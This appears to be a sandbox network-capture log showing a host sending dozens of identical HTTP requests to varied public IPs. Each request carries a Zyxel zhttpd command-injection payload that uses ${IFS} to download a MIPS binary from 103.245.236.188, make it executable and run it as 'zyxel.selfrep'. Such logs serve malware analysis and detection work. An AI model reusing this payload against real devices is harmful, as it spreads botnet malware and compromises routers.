                                                Jan 12, 2024 18:24:36.874454021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4663192.168.2.135431082.104.95.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.874497890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4664192.168.2.1345542150.105.165.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.874524117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4665192.168.2.1347110212.230.226.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.874576092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4666192.168.2.1341644205.136.147.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.874600887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4667192.168.2.1339780154.185.216.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.874635935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4668192.168.2.1352518130.202.231.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.874687910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4669192.168.2.1346264169.43.164.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.874705076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4670192.168.2.1337078179.246.110.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.874759912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4671192.168.2.1333370196.77.1.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.874797106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4672192.168.2.1348632107.216.215.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.874802113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4673192.168.2.1342824218.85.92.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.874849081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4674192.168.2.133368038.2.54.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.874895096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4675192.168.2.1333302187.60.139.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.874929905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4676192.168.2.133886652.21.45.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.874978065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4677192.168.2.134784283.192.180.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875020027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4678192.168.2.135786637.81.57.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875040054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4679192.168.2.133406682.44.3.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875092983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4680192.168.2.134791277.171.237.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875122070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4681192.168.2.1350260102.129.40.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875153065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4682192.168.2.1349482107.245.163.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875185966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4683192.168.2.134205241.189.225.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875219107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4684192.168.2.1337594103.92.135.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875288010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4685192.168.2.1337270222.68.71.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875318050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4686192.168.2.134070857.56.28.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875361919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4687192.168.2.134088247.225.95.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875385046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4688192.168.2.1341056182.241.212.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875422955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4689192.168.2.133277451.245.239.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875447035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4690192.168.2.13599704.253.183.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875502110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4691192.168.2.1354106170.156.141.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875539064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4692192.168.2.1356510131.16.243.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875567913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4693192.168.2.1348774142.61.111.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875619888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4694192.168.2.135405690.24.237.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875659943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4695192.168.2.1338744171.7.42.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875665903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4696192.168.2.1360834146.165.217.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875679970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4697192.168.2.1345458195.198.14.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875734091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4698192.168.2.133941442.207.88.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875799894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4699192.168.2.135806819.204.71.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875829935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4700192.168.2.1347376185.46.31.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875859976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4701192.168.2.1350946189.102.83.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875921965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4702192.168.2.1336902163.104.57.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875952005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4703192.168.2.1351526221.104.207.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.875981092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4704192.168.2.1351026142.118.86.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876029968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4705192.168.2.133398663.221.69.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876075983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4706192.168.2.1346844205.57.175.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876127958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4707192.168.2.135487898.193.85.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876168013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4708192.168.2.134496298.132.79.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876243114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4709192.168.2.1358722161.168.185.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876257896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4710192.168.2.1349254152.21.10.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876286030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4711192.168.2.1334922185.81.70.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876310110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4712192.168.2.1346158106.150.224.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876332045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4713192.168.2.133813840.75.134.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876368046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4714192.168.2.135299243.34.101.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876401901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4715192.168.2.133758232.119.5.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876446009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4716192.168.2.134720649.144.182.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876466036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4717192.168.2.135921269.136.77.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876511097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4718192.168.2.1360744150.50.83.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876534939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4719192.168.2.1343740143.242.122.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876579046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4720192.168.2.1343688101.230.70.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876615047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4721192.168.2.1337092175.168.156.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876684904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4722192.168.2.134626441.128.226.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876702070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4723192.168.2.1357210104.150.32.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876743078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4724192.168.2.13567924.61.94.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876755953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4725192.168.2.1339810182.34.176.190443
                                                TimestampBytes transferredDirectionData
